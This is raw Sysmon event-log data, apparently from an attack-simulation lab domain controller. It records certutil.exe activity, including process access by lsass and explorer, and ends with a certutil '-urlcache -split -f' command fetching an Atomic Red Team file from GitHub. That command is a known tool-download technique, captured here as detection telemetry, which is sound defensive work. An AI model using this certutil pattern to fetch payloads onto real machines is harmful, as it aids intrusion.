21:50:19.935{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000005917909Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.932{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exeC:\Temp\foo.txt2021-03-24 21:50:19.932 23542300x80000000000000005917908Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.931{896A638B-B41B-605B-8969-00000000AE01}8116ATTACKRANGE\AdministratorC:\Windows\System32\certutil.exeC:\Windows\System32\2d2a313164ae3a724cc53b0c8e104dd6053f8402.keyMD5=DDA4F30CDD84D94A82586B61071F6AE3,SHA256=65AF6027045D23175366EAB50E460AB3EE7790E591CB84CC32C78AC63A4C90E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917907Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.888{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917906Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.786{896A638B-B5C8-6058-0B00-00000000AE01}6127564C:\Windows\system32\lsass.exe{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917905Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.786{896A638B-B5C8-6058-0B00-00000000AE01}6127564C:\Windows\system32\lsass.exe{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917904Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.773{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917903Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.773{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917902Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.749{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917901Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.748{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917900Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.748{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917899Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.748{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B41B-605B-8A69-00000000AE01}7216C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917898Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.747{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B41B-605B-8A69-00000000AE01}7216C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917897Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.742{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917896Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.742{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917895Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.742{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917894Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.741{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917893Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.740{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B41B-605B-8A69-00000000AE01}7216C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917892Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.740{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B41B-605B-8A69-00000000AE01}7216C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917891Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.740{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B41B-605B-8A69-00000000AE01}7216C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917890Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.740{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B41B-605B-8A69-00000000AE01}7216C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917889Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.737{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917888Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.737{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917887Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.733{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B41B-605B-8A69-00000000AE01}7216C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917886Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.732{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B41B-605B-8A69-00000000AE01}7216C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917885Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.728{896A638B-B41B-605B-8A69-00000000AE01}72161020C:\Windows\system32\conhost.exe{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917884Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.721{896A638B-B8DD-6058-9202-00000000AE01}36323472C:\Windows\system32\csrss.exe{896A638B-B41B-605B-8A69-00000000AE01}7216C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917883Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.718{896A638B-B8DD-6058-9202-00000000AE01}36324636C:\Windows\system32\csrss.exe{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917882Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.717{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917881Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.717{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917880Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.717{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917879Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.717{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917878Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.716{896A638B-B5C8-6058-0500-00000000AE01}396512C:\Windows\system32\csrss.exe{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917877Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.716{896A638B-B3F6-605B-7769-00000000AE01}51966688C:\Windows\system32\wbem\wmiprvse.exe{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000005917876Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.716{896A638B-B41B-605B-8969-00000000AE01}8116C:\Windows\System32\certutil.exe10.0.14393.4169 (rs1_release.210107-1130)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.exe"C:\Windows\System32\certutil.exe" —urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt 